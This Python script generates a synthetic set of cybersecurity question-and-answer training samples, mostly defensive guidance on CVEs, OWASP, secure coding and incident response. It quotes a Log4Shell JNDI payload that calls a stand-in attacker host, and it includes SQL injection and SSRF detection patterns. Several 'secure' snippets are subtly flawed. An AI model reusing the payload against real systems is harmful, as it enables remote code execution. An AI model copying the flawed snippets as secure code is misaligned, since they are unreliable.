#!/usr/bin/env python3
"""Build a cybersecurity training corpus from a local knowledge base.
No network required. Generates alpaca-format samples.
Output: data/processed/cyber_train.jsonl"""
import json, os
from pathlib import Path
OUT = Path("data/processed/cyber_train.jsonl")
OUT.parent.mkdir(parents=True, exist_ok=True)
S = []
def add(i, inp="", o=""):
    S.append({"instruction": i.strip(), "input": inp.strip(), "output": o.strip()})
# CVE
add("Explain CVE-2021-44228 (Log4Shell) and how to remediate it.", "", "CVE-2021-44228 is a critical RCE in Apache Log4j2 via JNDI injection. Attackers exploit ${jndi:ldap://attacker/exploit} in log messages. Remediation: upgrade Log4j >= 2.15.0, set formatMsgNoLookups=true, remove JndiLookup.class, use WAF rules.")
add("Analyze CVE-2021-34527 (PrintNightmare) impact.", "", "Windows Print Spooler RCE with SYSTEM privileges via RPC. Enables full AD domain compromise. Remediation: patch, disable Print Spooler, restrict Point and Print.")
add("What is CVE-2022-0778 and how does it affect OpenSSL?", "", "Infinite loop in BN_mod_sqrt() when parsing elliptic curve parameters. Causes DoS. Patch to OpenSSL >= 1.1.1n or 3.0.2.")
add("Explain the SolarWinds供应链攻击 (CVE-2020-10148).", "", "SolarWinds Orion was compromised via SUNBURST backdoor injected during build process. Affected 18,000+ organizations. Detection: check for SUNBURST strings in Orion DLLs, IOCs: avsvmcloud[.]com. Mitigation: isolate affected systems, reset credentials, audit OAuth tokens.")
add("Analyze the Log4Shell bypass CVE-2021-45046.", "", "CVE-2021-45046 bypasses the CVE-2021-44228 fix in certain non-default configurations. Thread Context Map patterns allow JNDI lookups. Remediation: upgrade to Log4j >= 2.16.0 which disables JNDI by default.")
add("What makes CVE-2023-44487 (HTTP/2 Rapid Reset) critical?", "", "HTTP/2 protocol vulnerability allowing rapid stream resets to cause DoS. Affects all major web servers. Remediation: apply vendor patches, implement rate limiting on RST_STREAM frames.")
# CWE
add("Explain CWE-798 and how to prevent hardcoded credentials.", "", "CWE-798: Hard-coded passwords/API keys in source code. Prevention: use environment variables, secrets managers (Vault, AWS Secrets Manager), .env files with .gitignore, rotate credentials regularly.")
add("How do I prevent CWE-22 (Path Traversal)?", "", "Validate and sanitize file paths. Use os.path.realpath() and verify the resolved path is within allowed directories. Never use user input directly in file operations. Use allowlists for permitted paths.")
add("Explain CWE-89 (SQL Injection) prevention.", "", "Use parameterized queries/prepared statements. Never concatenate user input into SQL. Use ORM frameworks (SQLAlchemy, Django ORM). Apply least-privilege database permissions. Validate input types.")
add("What is CWE-79 (XSS) and how to prevent it?", "", "Cross-Site Scripting: injecting malicious scripts into web pages. Prevention: output encoding (HTML, JS, URL), Content Security Policy headers, HTTPOnly cookies, input validation, use frameworks that auto-escape (React, Django templates).")
add("Explain CWE-287 (Improper Authentication) and mitigations.", "", "Authentication bypass via weak/missing checks. Mitigations: MFA, account lockout, secure password storage (bcrypt/scrypt/argon2), session management, multi-factor auth.")
add("How do I prevent CWE-502 (Deserialization of Untrusted Data)?", "", "Never deserialize untrusted data. Use safe formats (JSON instead of pickle). If pickle is required, use HMAC signing. Implement type allowlisting. Consider using sandboxed deserialization.")
# Secure Code - Python
add("Write a secure Python function to handle file uploads.", "", "import os\nimport hashlib\nfrom werkzeug.utils import secure_filename\n\ndef handle_upload(file, upload_dir, max_size=10*1024*1024):\n    filename = secure_filename(file.filename)\n    ext = os.path.splitext(filename)[1].lower()\n    if ext not in ('.jpg', '.png', '.pdf'):\n        raise ValueError('Invalid file type')\n    data = file.read()\n    if len(data) > max_size:\n        raise ValueError('File too large')\n    filepath = os.path.join(upload_dir, filename)\n    file.seek(0)\n    file.save(filepath)\n    return filepath")
add("Write a secure password hashing function.", "", "import hashlib\nimport os\n\ndef hash_password(password: str, salt: bytes = None) -> tuple:\n    if salt is None:\n        salt = os.urandom(32)\n    key = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n    return key, salt\n\ndef verify_password(password: str, key: bytes, salt: bytes) -> bool:\n    new_key = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n    return new_key == key")
add("Fix this vulnerable Python code: exec(user_input)", "", "Replace exec(user_input) with a safe alternative:\n1. Use ast.literal_eval() for data parsing\n2. Use a whitelist of allowed functions\n3. Use subprocess.run() with a list of args for commands\n4. Never execute arbitrary user code. Example fix:\nimport ast\ntry:\n    result = ast.literal_eval(user_input)  # safe evaluation\nexcept ValueError:\n    raise ValueError('Invalid input')")
add("Write a secure Flask route for user registration.", "", "from flask import Flask, request, jsonify\nimport bcrypt\nimport re\n\n@app.route('/register', methods=['POST'])\ndef register():\n    data = request.get_json()\n    email = data.get('email', '')\n    password = data.get('password', '')\n    if not re.match(r'^[^@]+@[^@]+\\.[^@]+$', email):\n        return jsonify({'error': 'Invalid email'}), 400\n    if len(password) < 12:\n        return jsonify({'error': 'Password too short'}), 400\n    hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt())\n    # save to database\n    return jsonify({'message': 'User created'}), 201")
# Secure Code - C
add("Fix the buffer overflow in this C code.", "void copy(char *src){ char buf[16]; strcpy(buf, src); }", "strcpy overflows buf[16]. Fix: use strncpy with bounds checking:\nvoid copy(char *src) {\n    char buf[16];\n    strncpy(buf, src, sizeof(buf) - 1);\n    buf[sizeof(buf) - 1] = '\\0';\n}\nOr better: use snprintf(buf, sizeof(buf), '%s', src).")
add("Write a secure C function to parse an integer from user input.", "", "#include <errno.h>\n#include <limits.h>\n\nint safe_parse_int(const char *str, int *result) {\n    if (!str || !result) return -1;\n    errno = 0;\n    char *end;\n    long val = strtol(str, &end, 10);\n    if (errno != 0 || *end != '\\0' || val > INT_MAX || val < INT_MIN)\n        return -1;\n    *result = (int)val;\n    return 0;\n}")
# OWASP
add("Explain the OWASP Top 10 A01:2021 (Broken Access Control).", "", "Broken Access Control moved from #5 to #1 in OWASP 2021. Includes: CORS misconfig, IDOR, privilege escalation, JWT validation failures. Prevention: deny by default, implement RBAC, validate server-side, log access failures, rate-limit API access.")
add("What is OWASP A03:2021 (Injection) and how to prevent it?", "", "Injection flaws allow untrusted data to be sent to interpreters. Types: SQL, NoSQL, OS command, LDAP, XSS. Prevention: use parameterized queries, escape output, validate input, use safe APIs, apply least privilege.")
add("Explain OWASP A07:2021 (Identification and Authentication Failures).", "", "Previously Broken Authentication. Includes: credential stuffing, weak passwords, missing MFA, session fixation. Prevention: implement MFA, enforce strong passwords, limit failed logins, use secure session management.")
# Network Security
add("How do I detect a man-in-the-middle attack?", "", "Signs: unexpected certificate warnings, SSL/TLS downgrade, duplicate IP addresses, ARP cache changes, slow connections. Prevention: use HSTS, certificate pinning, mutual TLS, monitor certificate transparency logs.")
add("Explain the difference between IDS and IPS.", "", "IDS (Intrusion Detection System) monitors traffic and alerts on suspicious activity but does not block. IPS (Intrusion Prevention System) actively blocks detected threats. IDS is passive; IPS is inline. Use both: IDS for visibility, IPS for automated response.")
add("How do I secure a REST API?", "", "1. Use HTTPS everywhere\n2. Implement OAuth 2.0 / JWT\n3. Rate limiting per client\n4. Input validation and sanitization\n5. CORS configuration\n6. API key rotation\n7. Request/response logging\n8. Content-Type validation\n9. Helmet.js / security headers\n10. API versioning")
# Incident Response
add("What are the steps of an incident response plan?", "", "NIST SP 800-61: 1) Preparation - tools, playbooks, team\n2) Detection & Analysis - SIEM alerts, log analysis\n3) Containment - isolate affected systems\n4) Eradication - remove malware, patch vulnerabilities\n5) Recovery - restore from clean backups\n6) Post-Incident - lessons learned, update playbooks")
add("How do I handle a ransomware incident?", "", "1. Isolate infected systems immediately\n2. Do NOT pay the ransom\n3. Preserve forensic evidence (disk images)\n4. Identify the ransomware variant\n5. Check for available decryptors (nomoreransom.org)\n6. Restore from offline backups\n7. Reset all credentials\n8. Report to law enforcement (FBI IC3)\n9. Notify affected parties")
add("Explain the MITRE ATT&CK framework for incident response.", "", "MITRE ATT&CK maps adversary tactics, techniques, and procedures (TTPs). During IR: 1) Map observed IOCs to ATT&CK techniques\n2) Identify the threat group (if known)\n3) Understand the full attack chain\n4) Prioritize detection and response\n5) Share intelligence via STIX/TAXII\nUse: attack.mitre.org, ATT&CK Navigator for visualization.")
# Cryptography
add("Explain the difference between symmetric and asymmetric encryption.", "", "Symmetric: same key for encrypt/decrypt (AES, ChaCha20). Fast, used for bulk data. Key distribution is the challenge.\nAsymmetric: public/private key pair (RSA, ECC). Slower, used for key exchange and signatures. Solves key distribution.\nHybrid approach: use asymmetric to exchange a symmetric session key, then use symmetric for data (TLS).")
add("Why is MD5 insecure for password hashing?", "", "MD5 is broken: collision attacks in seconds, no salt by default, designed for speed (bad for passwords). Use bcrypt/scrypt/argon2 instead. If MD5 must be used for non-security purposes, it is still acceptable for checksums.")
add("How does TLS 1.3 improve over TLS 1.2?", "", "TLS 1.3: removes weak ciphers (RSA key exchange, RC4, 3DES), mandates forward secrecy, reduces handshake to 1-RTT (0-RTT resumption), encrypts more of the handshake, removes compression (CRIME attack). Faster and more secure.")
# Vulnerability Scanning
add("How do I set up an automated vulnerability scanning pipeline?", "", "1. Deploy Nessus/OpenVAS for network scanning\n2. Use Snyk/Trivy for dependency scanning\n3. Integrate SAST (Semgrep/Checkmarx) in CI/CD\n4. Run DAST (OWASP ZAP/Burp) against staging\n5. Schedule weekly full scans\n6. Alert on critical/high findings\n7. Track remediation in Jira\n8. Report metrics (mean time to remediate)")
add("Compare SAST, DAST, and IAST vulnerability scanning.", "", "SAST (Static): analyzes source code without running. Fast, early in SDLC, high false positive rate.\nDAST (Dynamic): tests running application. Finds runtime issues, no source needed, slower.\nIAST (Interactive): combines SAST+DAST, instruments app during testing. Most accurate but higher overhead.\nUse all three in a defense-in-depth approach.")
# Malware Analysis
add("What are the key steps in malware analysis?", "", "1. Static analysis: strings, PE headers, imports, packer detection\n2. Dynamic analysis: sandbox execution (Cuckoo/Any.Run), network captures\n3. Code analysis: disassembly (IDA/Ghidra), deobfuscation\n4. IOC extraction: C2 domains, file hashes, registry keys\n5. YARA rule creation for detection\n6. Report findings to threat intelligence platform")
add("Explain the difference between a virus and a worm.", "", "Virus: requires host file/user action to spread, attaches to executables, activates on trigger.\nWorm: self-replicating, spreads autonomously via network, no host file needed.\nExamples: Melissa (virus), WannaCry (worm), Conficker (worm).\nPrevention: patches, network segmentation, endpoint protection.")
# Add more samples to reach ~100+
add("Write a regex to detect SQL injection patterns.", "", "import re\nSQLI_PATTERN = re.compile(r\"(\\b(select|union|insert|drop|update|delete)\\b.*(\\bfrom\\b|\\bwhere\\b)|('\\s*or\\s*'1'='1)|(--|#|/\\*))\", re.IGNORECASE)\ndef detect_sqli(input_str):\n    return bool(SQLI_PATTERN.search(input_str))")
add("How do I implement rate limiting in a Python web app?", "", "from flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\nlimiter = Limiter(app=app, key_func=get_remote_address)\n\n@app.route('/api/data')\n@limiter.limit('100/hour')\ndef get_data():\n    return jsonify(data)\n\n# Or use a token bucket algorithm:\nimport time\nclass TokenBucket:\n    def __init__(self, rate, capacity):\n        self.rate = rate\n        self.capacity = capacity\n        self.tokens = capacity\n        self.last = time.time()\n    def consume(self):\n        now = time.time()\n        self.tokens += (now - self.last) * self.rate\n        self.last = now\n        self.tokens = min(self.tokens, self.capacity)\n        if self.tokens >= 1:\n            self.tokens -= 1\n            return True\n        return False")
add("Explain SSRF (Server-Side Request Forgery) and how to prevent it.", "", "SSRF: attacker makes the server send requests to internal resources. Prevention: validate/whitelist URLs, block internal IPs (127.0.0.1, 10.x, 169.254.x), use a proxy for outbound requests, disable HTTP redirects, network segmentation.")
add("How do I securely store API keys in a Python application?", "", "1. Use environment variables: os.environ.get('API_KEY')\n2. Use a secrets manager (AWS Secrets Manager, HashiCorp Vault)\n3. Use .env files with python-dotenv (add .env to .gitignore)\n4. Never hardcode keys in source code\n5. Rotate keys regularly\n6. Use least-privilege API key permissions")
add("Write a secure token generation function.", "", "import secrets\nimport hashlib\n\ndef generate_api_key(length=32):\n    return secrets.token_urlsafe(length)\n\ndef generate_session_token():\n    return secrets.token_hex(32)\n\ndef hash_token(token: str) -> str:\n    return hashlib.sha256(token.encode()).hexdigest()")
add("Explain the OWASP ASVS (Application Security Verification Standard).", "", "ASVS provides a framework for app security requirements. Levels:\nLevel 1: Basic (minimum)\nLevel 2: Standard (most apps)\nLevel 3: Advanced (high-value)\nCovers: authentication, session, access control, validation, cryptography, error handling, logging, data protection, communication, files, APIs, configuration.")
add("How do I implement Content Security Policy (CSP)?", "", "Content-Security-Policy header restricts resource loading:\nContent-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'none'; frame-ancestors 'none'\n\nStart with Content-Security-Policy-Report-Only to test without breaking. Use report-uri for violation reports.")
add("Explain DNS rebinding attacks and how to prevent them.", "", "DNS rebinding: attacker controls DNS to point to internal IPs, bypassing same-origin policy. Prevention: validate Host header, use DNS pinning, block private IP ranges in responses, use CSP, implement origin checks.")
# Web Security
add("How do I prevent clickjacking?", "", "1. X-Frame-Options: DENY or SAMEORIGIN\n2. Content-Security-Policy: frame-ancestors 'none'\n3. X-Frame-Options: ALLOW-FROM (deprecated)\n4. JavaScript frame-busting (fallback)\n5. Use SameSite cookie attribute")
add("Explain CSRF attacks and how to prevent them.", "", "CSRF: attacker tricks user into making unintended requests. Prevention: anti-CSRF tokens (synchronizer pattern), SameSite cookies, verify Origin/Referer headers, require re-authentication for sensitive actions, use double-submit cookie pattern.")
add("How do I secure WebSocket connections?", "", "1. Use wss:// (TLS) always\n2. Authenticate on connection (JWT in initial handshake)\n3. Validate Origin header\n4. Implement rate limiting\n5. Validate all incoming messages\n6. Use message size limits\n7. Implement ping/pong for connection health\n8. Log connection events")
add("Write a secure session management implementation.", "", "import secrets\nfrom datetime import datetime, timedelta\n\ndef create_session(user_id, db):\n    token = secrets.token_urlsafe(32)\n    db.sessions.insert({\n        'token_hash': hashlib.sha256(token.encode()).hexdigest(),\n        'user_id': user_id,\n        'created_at': datetime.utcnow(),\n        'expires_at': datetime.utcnow() + timedelta(hours=24),\n        'ip': request.remote_addr\n    })\n    return token\n\ndef validate_session(token, db):\n    h = hashlib.sha256(token.encode()).hexdigest()\n    session = db.sessions.find_one({'token_hash': h})\n    if not session or session['expires_at'] < datetime.utcnow():\n        return None\n    return session")
add("How do I implement secure password reset?", "", "1. Generate time-limited token (1 hour expiry)\n2. Send via email only (not displayed)\n3. Use constant-time comparison for tokens\n4. Invalidate after use\n5. Require strong new password\n6. Invalidate all existing sessions\n7. Log the reset event\n8. Rate-limit reset requests per email")
add("Explain XML External Entity (XXE) attacks.", "", "XXE: parsing XML with external entity references allows file read, SSRF, DoS. Prevention: disable DTD processing, disable external entities, use JSON instead of XML, validate XML input, use defusedxml library in Python.")
add("Write a secure XML parser in Python.", "", "import defusedxml.ElementTree as ET\n\n# Safe XML parsing\ntree = ET.parse(xml_file)\nroot = tree.getroot()\n\n# OR use defusedxml directly:\nimport defusedxml\nfrom defusedxml.cElementTree import fromstring\ndata = fromstring(xml_string)\n\n# NEVER use:\n# import xml.etree.ElementTree as ET  # vulnerable to XXE")
add("How do I prevent SSRF in a Python application?", "", "from urllib.parse import urlparse\nimport ipaddress\n\ndef is_safe_url(url):\n    parsed = urlparse(url)\n    if parsed.scheme not in ('http', 'https'):\n        return False\n    try:\n        ip = ipaddress.ip_address(parsed.hostname)\n        return ip.is_global\n    except ValueError:\n        pass\n    # Block internal hostnames\n    blocked = ['localhost', '127.0.0.1', '0.0.0.0', 'metadata.google.internal']\n    return parsed.hostname not in blocked")
add("Explain deserialization vulnerabilities in Python pickle.", "", "Pickle deserialization can execute arbitrary code via __reduce__. An attacker can craft a payload that runs os.system('malicious command'). Prevention: never pickle untrusted data, use JSON, implement HMAC signing for pickle data, use RestrictedUnpickler to allow only safe classes.")
add("Write a safe pickle unpickler.", "", "import pickle\nimport io\n\nclass SafeUnpickler(pickle.Unpickler):\n    ALLOWED = {'builtins': {'set', 'frozenset'}}\n    def find_class(self, module, name):\n        if module in self.ALLOWED and name in self.ALLOWED.get(module, {}):\n            return super().find_class(module, name)\n        raise pickle.UnpicklingError(f'Forbidden: {module}.{name}')\n\ndef safe_loads(data):\n    return SafeUnpickler(io.BytesIO(data)).load()")
# Cloud Security
add("How do I secure an AWS S3 bucket?", "", "1. Block public access by default\n2. Enable server-side encryption (SSE-S3 or SSE-KMS)\n3. Use bucket policies with least privilege\n4. Enable access logging\n5. Enable MFA delete for versioned buckets\n6. Use VPC endpoints for private access\n7. Enable AWS Config rules for S3 compliance\n8. Use pre-signed URLs for temporary access")
add("Explain container security best practices.", "", "1. Use minimal base images (Alpine, distroless)\n2. Don't run as root (USER directive)\n3. Scan images for vulnerabilities (Trivy, Snyk)\n4. Use read-only filesystem\n5. Drop all capabilities, add only needed\n6. Use secrets management (not env vars)\n7. Implement network policies\n8. Enable runtime protection (Falco)")
add("How do I implement zero trust architecture?", "", "Zero Trust: never trust, always verify.\n1. Verify identity (MFA for all users)\n2. Device health checks\n3. Least-privilege access (Just-In-Time)\n4. Micro-segmentation\n5. Encrypt all traffic (mTLS)\n6. Continuous monitoring and validation\n7. Assume breach mentality\n8. Log and audit everything")
# Reverse Engineering
add("How do I analyze a suspicious binary safely?", "", "1. Use isolated VM (no network)\n2. Static analysis: strings, file (command), readelf\n3. Disassembly: Ghidra, radare2, IDA\n4. Dynamic analysis: strace, ltrace, ldd\n5. Network capture: tcpdump in sandbox\n6. Memory analysis: Volatility\n7. YARA rule matching\n8. Never run on production systems")
add("Explain common binary obfuscation techniques.", "", "1. Packing (UPX, custom packers) - compress/encrypt code\n2. Anti-debugging (ptrace checks, timing)\n3. Control flow flattening\n4. Opaque predicates\n5. String encryption\n6. Dead code insertion\n7. Virtualization-based obfuscation\nDeobfuscation: unpack, patch anti-debug, simplify CFG, decrypt strings")
# Final batch
add("How do I create a honeypot for threat detection?", "", "Deploy fake services (SSH, HTTP, SMB) that log all interaction. Use Cowrie (SSH), Dionaea (multi-protocol), or T-Pot. Monitor for: credential attempts, file uploads, lateral movement. Alert on any interaction. Place in DMZ and internal segments.")
add("Explain supply chain attacks and how to defend against them.", "", "Supply chain: compromising a trusted dependency. Examples: SolarWinds, Log4Shell, event-stream npm. Defense: pin dependency versions, verify checksums, audit dependencies (Snyk/Dependabot), use SBOMs, implement SLSA framework, code signing.")
add("How do I secure a CI/CD pipeline?", "", "1. Store secrets in vault (not env vars)\n2. Sign commits and artifacts\n3. Scan code and dependencies\n4. Use isolated build environments\n5. Implement branch protection\n6. Require code reviews\n7. Audit pipeline access\n8. Use SLSA Level 3+ compliance\n9. Immutable build infrastructure")
add("Write a Python function to validate JWT tokens securely.", "", "import jwt\nfrom jwt import PyJWKClient\n\ndef validate_jwt(token, jwks_url):\n    try:\n        jwks_client = PyJWKClient(jwks_url)\n        signing_key = jwks_client.get_signing_key_from_jwt(token)\n        payload = jwt.decode(\n            token,\n            signing_key.key,\n            algorithms=['RS256'],\n            options={'require': ['exp', 'iss', 'sub']}\n        )\n        return payload\n    except jwt.ExpiredSignatureError:\n        raise ValueError('Token expired')\n    except jwt.InvalidTokenError as e:\n        raise ValueError(f'Invalid token: {e}')")
add("Explain memory safety vulnerabilities in C/C++.", "", "Common types: buffer overflow (stack/heap), use-after-free, double-free, null pointer dereference, uninitialized memory, format string bugs. Mitigations: ASLR, DEP/NX, stack canaries, SafeInt, smart pointers, address sanitizers (ASan/MSan). Use memory-safe languages when possible.")
add("How do I implement network segmentation?", "", "1. VLANs for different trust levels\n2. Firewall rules between segments\n3. DMZ for public-facing services\n4. Micro-segmentation with software-defined networking\n5. Zero-trust network access (ZTNA)\n6. Monitor east-west traffic\n7. Implement 802.1X for device authentication\n8. Regular penetration testing of boundaries")

# Write out
with open(OUT, 'w') as f:
    for s in S:
        f.write(json.dumps(s) + '\n')
print(f"Wrote {len(S)} training samples to {OUT}")
